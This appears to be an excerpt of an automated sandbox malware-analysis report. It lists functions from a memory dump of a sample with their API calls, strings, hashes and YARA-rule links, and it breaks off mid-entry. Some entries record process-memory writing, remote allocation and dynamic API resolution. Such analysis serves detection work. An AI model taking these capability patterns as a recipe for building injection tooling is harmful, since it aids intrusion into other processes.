API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 432b700c179750f88204e0e7b362135e1d68bb0241d59ad70de22eee1f7a28c1
Instruction ID: 4963dcd8f286ddc43e8e6a26775d5affbdb1c137de7d261fe22faeefeb52aab8
Opcode Fuzzy Hash: 432b700c179750f88204e0e7b362135e1d68bb0241d59ad70de22eee1f7a28c1
Instruction Fuzzy Hash: 01415175508119FFDF169F68C848EEDBBB5FB05324F10831AF86496290CB35AE50DB91

Function 000A6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 000A6159
GetForegroundWindow.USER32 ref: 000A6170
GetDC.USER32(00000000), ref: 000A61AC
GetPixel.GDI32(00000000,?,00000003), ref: 000A61B8
ReleaseDC.USER32(00000000,00000003), ref: 000A61F3

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: cf68a1b234620e8c5c7363bf51933615d90ad59877fd45e4e84ed6fc53fa7e4d
Instruction ID: e4f1ffb12a4698a95436e52ed2cc6d4f7e117e8d728f82f10ae2587b4e821e44
Opcode Fuzzy Hash: cf68a1b234620e8c5c7363bf51933615d90ad59877fd45e4e84ed6fc53fa7e4d
Instruction Fuzzy Hash: CC219675A00204DFD714EFA5DD88E9ABBF9EF89311F048469F94A97362CA75AC00DB90

Function 0008C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0008C84C
_memcmp.LIBCMT ref: 0008C86A
_memcmp.LIBCMT ref: 0008C87D
_memcmp.LIBCMT ref: 0008C895
_memcmp.LIBCMT ref: 0008C8AD

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 7013be005142e871e5c3b491c00f646cd102947e072a72c89c9e1304fd7a05a7
Instruction ID: 7c9920bd5ef93dc350a0a49b0eb1438117d3c7d14476737be9e4c42f687b9940
Opcode Fuzzy Hash: 7013be005142e871e5c3b491c00f646cd102947e072a72c89c9e1304fd7a05a7
Instruction Fuzzy Hash: 3E019272A84105BBF21477119C82FEF637CAB60395F048029FE469A642EB70EE1583F1

Function 0009C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0009CA75
CoCreateInstance.OLE32(000C3D3C,00000000,00000001,000C3BAC,?), ref: 0009CA8D

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

CoUninitialize.OLE32 ref: 0009CCFA

Strings

.lnk, xrefs: 0009CA09, 0009CA31, 0009CA3B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: eb04cc0094fc945a59bf279328642e2a3bbe02bfcf3dfea02b61b0c070e4ee7a
Instruction ID: ad757608a671db4ccb02f49557e17460c77d025c8658709998d30a4c827e22b0
Opcode Fuzzy Hash: eb04cc0094fc945a59bf279328642e2a3bbe02bfcf3dfea02b61b0c070e4ee7a
Instruction Fuzzy Hash: 7FA12AB1508205AFD301EF64D881EABB7ECEF95714F00492CF5559B292EB70EA49CB92

Function 0003E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

Part of subcall function 00041680: _memmove.LIBCMT ref: 000416DB

__swprintf.LIBCMT ref: 0003E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0003E431

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 36d8c678b70021d7948e7a4fab2b2c77e3cb838e592fdf95b9b31ebc56f22013
Instruction ID: 1af45ab18dfcb5a408c9e4a59c9cb909f0c8c4d2fb08fbb1a9701ebc6f33cd58
Opcode Fuzzy Hash: 36d8c678b70021d7948e7a4fab2b2c77e3cb838e592fdf95b9b31ebc56f22013
Instruction Fuzzy Hash: B3917E715086419FC725EF24D896CEFB7E8AF95300F404A2DF885972A2EA70ED44CB56

Function 00050654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00050699
+, xrefs: 00050690

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 4a6e8357d11511aed7fd70a6fde11ce3758d8cbc52fea4788106ee99d77c9c08
Instruction ID: 887fa5e95b0c1832ac86029838febdf0af9d72e299cb5e83435e2858776df1ea
Opcode Fuzzy Hash: 4a6e8357d11511aed7fd70a6fde11ce3758d8cbc52fea4788106ee99d77c9c08
Instruction Fuzzy Hash: E0510175904259CFDB25AF68C880AFE7BA0FF59310F144065ECC59B291DB36AC86CB61

Function 0008A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00091CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00089E4E,?,?,00000034,00000800,?,00000034), ref: 00091CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0008A3F7

Part of subcall function 00091C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00089E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00091CB0

Part of subcall function 00091BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00091C08
Part of subcall function 00091BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00089E12,00000034,?,?,00001004,00000000,00000000), ref: 00091C18
Part of subcall function 00091BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00089E12,00000034,?,?,00001004,00000000,00000000), ref: 00091C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0008A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0008A4B1

Strings

@, xrefs: 0008A4C9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b06760844c70f09d33d5ebbf2afc837dcdcc5e8bbef3d7f7fba749791ce73b3c
Instruction ID: 206c66ea4b7ab9e59d0068b06fcd997f4658084392e175febcf7a2f86fc23ff4
Opcode Fuzzy Hash: b06760844c70f09d33d5ebbf2afc837dcdcc5e8bbef3d7f7fba749791ce73b3c
Instruction Fuzzy Hash: 84414CB2A4121DAFDF10DFA4CC86ADEBBB8EF45300F0041A5FA45B7181DA706E45DBA1

Function 000B81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000B826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000B827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000B8284

Strings

msctls_updown32, xrefs: 000B81E9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: daa6aced49bef965110be6590f75c35e321ad2814863b91b3f4ff8c9b4bc15a6
Instruction ID: a19ff5e5d18996d289efed4a7f761c3a77003a99ae97523431798c3c4f663086
Opcode Fuzzy Hash: daa6aced49bef965110be6590f75c35e321ad2814863b91b3f4ff8c9b4bc15a6
Instruction Fuzzy Hash: 7A218CB1604208AFEB50DF58CC85DB737EDEF5A3A4B044159FA059B2A2CB71EC11DBA0

Function 000AC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0007027A,?), ref: 000AC6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000AC6F9

Strings

GetSystemWow64DirectoryW, xrefs: 000AC6F3
kernel32.dll, xrefs: 000AC6E2

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: e42b08a477ac653fc3da9e82769e4a710984143ac137c0caeb257b11b389ec95
Instruction ID: 801e285c58e49af93869eb253ad1f972cb5a39b7988baa0bfa73d9e853d0de84
Opcode Fuzzy Hash: e42b08a477ac653fc3da9e82769e4a710984143ac137c0caeb257b11b389ec95
Instruction Fuzzy Hash: ECE08278204302CFEB208B6AC848F4AB6E8EF05314B80842EE889D2220E778CC80CB10

Function 00044B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00044B44,?,000449D4,?,?,000427AF,?,00000001), ref: 00044B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00044B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00044B91
kernel32.dll, xrefs: 00044B80

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 110c8bb7597111e2532a549e9c0afdc3eaca3601d6441a73c321ed78f6992fe2
Instruction ID: d8106b138bfcf47686dd12d28d1fb1916ebb349b4fefa6274c772c4cfe9583e2
Opcode Fuzzy Hash: 110c8bb7597111e2532a549e9c0afdc3eaca3601d6441a73c321ed78f6992fe2
Instruction Fuzzy Hash: 33D017B0510B12CFE7209F31EC18B0AB6E4EF04351F15883ED98AE6550E774E880CA54

Function 00070030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00070034
__swprintf.LIBCMT ref: 00070065

Strings

%.3d, xrefs: 0007003F
WIN_XPe, xrefs: 000700A4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: a9a1671f3c1cf144e39e924775b8849352a5e6503d683dbef2209525c6e4142e
Instruction ID: c6280a639d3b8a84e97cd51a3ad563338957a77d105046795f996f44794db445
Opcode Fuzzy Hash: a9a1671f3c1cf144e39e924775b8849352a5e6503d683dbef2209525c6e4142e
Instruction Fuzzy Hash: 6AD012B1C18209EAC7399B90CC44EFE737CAB04314F108152F50AA2040E7399758EA6A

Function 000AE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 000AE7A7
CharLowerBuffW.USER32(?,?), ref: 000AE7EA

Part of subcall function 000ADE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 000ADEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 000AE9EA
_memmove.LIBCMT ref: 000AE9FD

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: f33e61fd880407fe0bac30e99fcd606974bc9459e1f784d89415796b016e6ed8
Instruction ID: fc328af4b38b64e12593947cbb4c431dda5f981921ceb5508cece0e8b189eb41
Opcode Fuzzy Hash: f33e61fd880407fe0bac30e99fcd606974bc9459e1f784d89415796b016e6ed8
Instruction Fuzzy Hash: 57C17A71A083419FC754DF68C4809AABBE4FF89714F04896EF8999B352D731E946CF82

Function 000A877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000A87AD
CoUninitialize.OLE32 ref: 000A87B8

Part of subcall function 000BDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,000A8A0E,?,00000000), ref: 000BDF71

VariantInit.OLEAUT32(?), ref: 000A87C3
VariantClear.OLEAUT32(?), ref: 000A8A94

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: d3314d67b6583853150ea6245476ad99e0b531ed0827a01dedfa40b3ca1480b6
Instruction ID: cdd6bc9043d5a05fad498b53200cf055727fac6ba1da6e52705a18063ccbf8ff
Opcode Fuzzy Hash: d3314d67b6583853150ea6245476ad99e0b531ed0827a01dedfa40b3ca1480b6
Instruction Fuzzy Hash: D1A14775204B019FD711EF54C885B6AB7E8BF89310F148959F99A9B3A2CB34FD04CB92

Function 0008814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000C3C4C,?), ref: 00088308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000C3C4C,?), ref: 00088320
CLSIDFromProgID.OLE32(?,?,00000000,000C0988,000000FF,?,00000000,00000800,00000000,?,000C3C4C,?), ref: 00088345
_memcmp.LIBCMT ref: 00088366

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 4f50bd327b22290cda734441f8a11055053a7e679b1134e79bb8631c494070f3
Instruction ID: 7176d1499f2fea18c3bd3144b26a4089608df3da8b970bf03071e611a5f2d73b
Opcode Fuzzy Hash: 4f50bd327b22290cda734441f8a11055053a7e679b1134e79bb8631c494070f3
Instruction Fuzzy Hash: 8B812B71A00109EFCB04DFD4C988EEEB7B9FF89315F208558E546AB250DB71AE06CB60

Function 0005492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000549C0
__flush.LIBCMT ref: 000549E0
__write.LIBCMT ref: 00054A13
__flsbuf.LIBCMT ref: 00054A41

Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 309fa2a6dec138398c1396154bbf1d92eb51edfecd63cb0e15f3205f0141f37a
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 4841D535A00706ABDF688E69C8859EF77E5EF8036AB24813DEC59C7680D7709DC88B45

Function 0008A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0008A68A
__itow.LIBCMT ref: 0008A6BB

Part of subcall function 0008A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0008A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0008A724
__itow.LIBCMT ref: 0008A77B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 4bcfdeea651daf60db947782f63f21f192d2e5daa9331323a087b2d69a4b53cd
Instruction ID: 7e8dc7a207179c4f0d6a7c430a928a461f88bb1b2467182aa248f0fa92d310ba
Opcode Fuzzy Hash: 4bcfdeea651daf60db947782f63f21f192d2e5daa9331323a087b2d69a4b53cd
Instruction Fuzzy Hash: FE4173B4B00209ABEF11EF54CC45BEE7BB9EF49750F04002AF945A3282DB749994DB96

Function 000A6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,000C0980), ref: 000A6B92
_strlen.LIBCMT ref: 000A6BC4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 0c0d9247e1b63bddc915bed619b06d8f4453ac5a8c3b033511936113f8c1ac70
Instruction ID: bebaca361586706969f38009cbb893561a099c2eb5d7ad401370c101df4797de
Opcode Fuzzy Hash: 0c0d9247e1b63bddc915bed619b06d8f4453ac5a8c3b033511936113f8c1ac70
Instruction Fuzzy Hash: FC416F71A00108ABCB14FBA4DC95EFEB3B9EF55310F188165F85A9B293DB31AD45CB90

Function 000663F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0006642B
__isleadbyte_l.LIBCMT ref: 00066459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00066487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000664BD

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ae5b2787d2f4e820a9b6d29556b22c885541f7b2152b883657c2fa0b479923f0
Instruction ID: d2dcd405233a08e3fcc21f83ef6077411b2047b2611a95d73476b71b53a157bb
